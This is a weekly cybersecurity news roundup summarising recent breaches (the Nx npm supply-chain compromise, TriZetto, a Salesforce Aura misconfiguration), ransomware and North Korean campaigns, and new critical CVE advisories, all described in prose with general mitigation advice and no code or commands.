This Week in Cybersecurity
The week of March 11 delivered one of the most technically alarming stories of the quarter: threat actor UNC6426 exploited a dormant npm supply chain compromise in the Nx monorepo toolkit to achieve full AWS administrator access — in just 72 hours — demonstrating that software supply chain risks have very long tails. The attack required no novel vulnerability; it was a patient, pre-staged operation waiting for the right target to pull a poisoned package.
Healthcare continues to be a prime target. Cognizant's TriZetto healthcare software platform exposed sensitive records for 3.4 million patients, while the ransomware ecosystem remains relentless: Velvet Tempest chained ClickFix social engineering lures with a new CastleRAT backdoor to bypass conventional defenses in targeted breaches. And North Korea's crypto-targeting unit UNC4899 delivered a trojanized file to a crypto firm employee via the Apple AirDrop protocol — a strikingly low-tech delivery for a nation-state actor, but effective precisely because it bypasses email and web filters entirely.
Top Stories
UNC6426 Chains Old nx npm Supply Chain Flaw to Full AWS Admin in 72 Hours
Threat actor UNC6426 exploited a previously disclosed but unmitigated supply chain compromise in the Nx monorepo build toolkit — a package with hundreds of thousands of weekly downloads — to achieve full AWS administrator access at a targeted organization. The escalation path ran from compromised CI/CD package → cloud metadata service abuse → IAM privilege escalation → full admin control, all within 72 hours of initial access. The attack underscores that supply chain backdoors do not expire: the malicious code had been dormant in the ecosystem for months before being weaponized against a specific target.
Cognizant TriZetto Breach Exposes 3.4 Million Patient Records
Cognizant's TriZetto healthcare software platform — used by hundreds of US health insurers, TPAs, and benefits administrators — suffered a data breach that exposed health data for 3.4 million patients. Compromised records include names, Social Security numbers, dates of birth, member IDs, and clinical information. The breach illustrates the cascading blast radius of healthcare SaaS compromises: a single vendor incident propagates across every client's member population simultaneously.
ShinyHunters Claims Mass Data Theft From 400 Firms via Salesforce Aura Misconfiguration
Prolific threat actor ShinyHunters claimed responsibility for mass data theft from over 400 organizations by exploiting a Salesforce Aura component misconfiguration that exposed unauthenticated Lightning API endpoints. The group alleges that organizations had deployed Aura components with guest-user access enabled, permitting bulk extraction of customer PII without triggering standard DLP or SIEM controls. This follows the group's prior high-profile breaches of Ticketmaster, Santander, and AT&T, and reinforces that SaaS misconfiguration has become a primary attack vector at scale.
Velvet Tempest Chains ClickFix With CastleRAT in Targeted Breaches
Velvet Tempest, an operator of Termite ransomware, was observed deploying a sophisticated two-stage attack chain: ClickFix social engineering lures present users with fake browser error dialogs instructing them to paste a PowerShell command that "fixes" the issue — which instead deploys CastleRAT, a custom backdoor with full remote access, keylogging, screenshot capture, and lateral movement capabilities. Because no malicious email attachment or link is involved, many email security gateways fail to flag the initial lure. Organizations should audit PowerShell execution policies and consider blocking clipboard-write injection from browser contexts.
North Korea's UNC4899 Breached Crypto Firm via AirDropped Trojanized File
UNC4899, North Korea's DPRK-nexus crypto-targeting unit, compromised a cryptocurrency firm by AirDropping a trojanized file directly to an employee's corporate MacBook — a technique that entirely circumvents email filtering, web proxies, and endpoint download controls. The file appeared as a legitimate business document; once opened, it established persistence via a Launch Agent and exfiltrated wallet credentials and internal keys. Organizations permitting AirDrop on corporate Apple devices should restrict discovery to Contacts Only or disable it via MDM policy.
More Headlines This Week
-
Ericsson US Breach: Ericsson's US subsidiary disclosed unauthorized access to internal systems affecting employees and enterprise service customers, with an active forensic investigation underway. Read more →
-
Phobos Admin Guilty Plea: Russian national Evgenii Ptitsyn pleaded guilty to operating the Phobos ransomware-as-a-service platform responsible for 1,000+ victims and $39M+ extorted, facing a maximum 20-year sentence. Read more →
-
Google: 90 Zero-Days Exploited in 2025: Google GTIG confirmed 90 zero-days were actively exploited last year with enterprise technology at an all-time high of 48% of all exploits — commercial spyware vendors have now surpassed nation-states as the leading zero-day exploiters. Read more →
-
Attack Surface Reduction Over Patch Speed: An analysis published this week argues that the reactive zero-day scramble is avoidable — organizations with reduced attack surfaces consistently outperform those focused solely on patch velocity. Read more →
-
Spanish-Ukrainian Gambling Ring Bust: Police dismantled a criminal network exploiting Ukrainian war refugees to launder nearly €4.75M through online gambling platforms — 12 arrests across Spain and Ukraine. Read more →
Security Advisories This Week
14 new CVEs added to the Security Advisories section this week — four rated Critical, ten rated High. Notable advisories below.
CVE-2025-11158 — Hitachi Vantara Pentaho RCE via Unrestricted Groovy Scripts (CVSS Critical) Unauthenticated attackers can submit arbitrary Groovy scripts to the Pentaho Business Analytics platform, achieving full remote code execution on the server. Any organization running Pentaho on an exposed network should treat this as an emergency patch. Full advisory →
CVE-2026-0953 — Tutor LMS Pro Auth Bypass — 30,000+ WordPress Sites at Risk (CVSS Critical) A broken authentication flaw in the Tutor LMS Pro WordPress plugin allows unauthenticated attackers to assume any user role including site administrator. With 30,000+ active installs, mass exploitation tooling is expected. Update immediately. Full advisory →
CVE-2026-29191 — ZITADEL SAML XSS Enables 1-Click Account Takeover (CVSS Critical) A reflected XSS in ZITADEL's SAML authentication endpoint allows attackers to craft a malicious URL that, when clicked by any authenticated user, hijacks their session — including administrators. Part of a three-CVE ZITADEL cluster disclosed this week. Full advisory →
CVE-2026-3630 — Delta Electronics COMMGR2 Stack Buffer Overflow (CVSS Critical) A stack-based buffer overflow in Delta Electronics' COMMGR2 industrial communication software allows unauthenticated remote code execution. COMMGR2 is widely deployed in manufacturing and critical infrastructure OT/ICS environments — patch or isolate immediately. Full advisory →
Also this week — High severity:
- CVE-2026-29067 — ZITADEL password reset link poisoned by Forwarded header injection, enabling full account takeover without valid credentials →
- CVE-2026-29192 — ZITADEL stored XSS via default redirect URI in OAuth clients, enabling admin-assisted account takeover →
- CVE-2026-3589 — WooCommerce CSRF flaw allows unauthenticated creation of admin accounts on any affected store →
- CVE-2026-3038 — FreeBSD kernel stack buffer overflow in
rtsock_msg_buffer()with local privilege escalation potential → - CVE-2018-25165 — SQL injection in Galaxy Forces MMORPG →
- CVE-2018-25169 — Denial of service in AMPPS 2.7 →
- CVE-2026-3730, CVE-2026-3740, CVE-2026-3746 — SQL injection cluster in SourceCodester web apps →
- CVE-2026-3734 — Improper authorization in SourceCodester Client Database Management System →
By the Numbers
| Metric | Value |
|---|---|
| Healthcare patients exposed (TriZetto) | 3.4 million |
| Firms targeted in Salesforce Aura campaign | 400+ |
| AWS admin access achieved in | 72 hours |
| Phobos ransomware victims worldwide | 1,000+ |
| Total extorted by Phobos RaaS | $39M+ |
| ZITADEL CVEs disclosed this week | 3 |
| Critical CVEs published this week | 4 |
| Total CVEs published this week | 14 |
| Zero-days exploited in 2025 (Google) | 90 (48% enterprise) |
CosmicBytez Labs — IT & Cybersecurity Intelligence Hub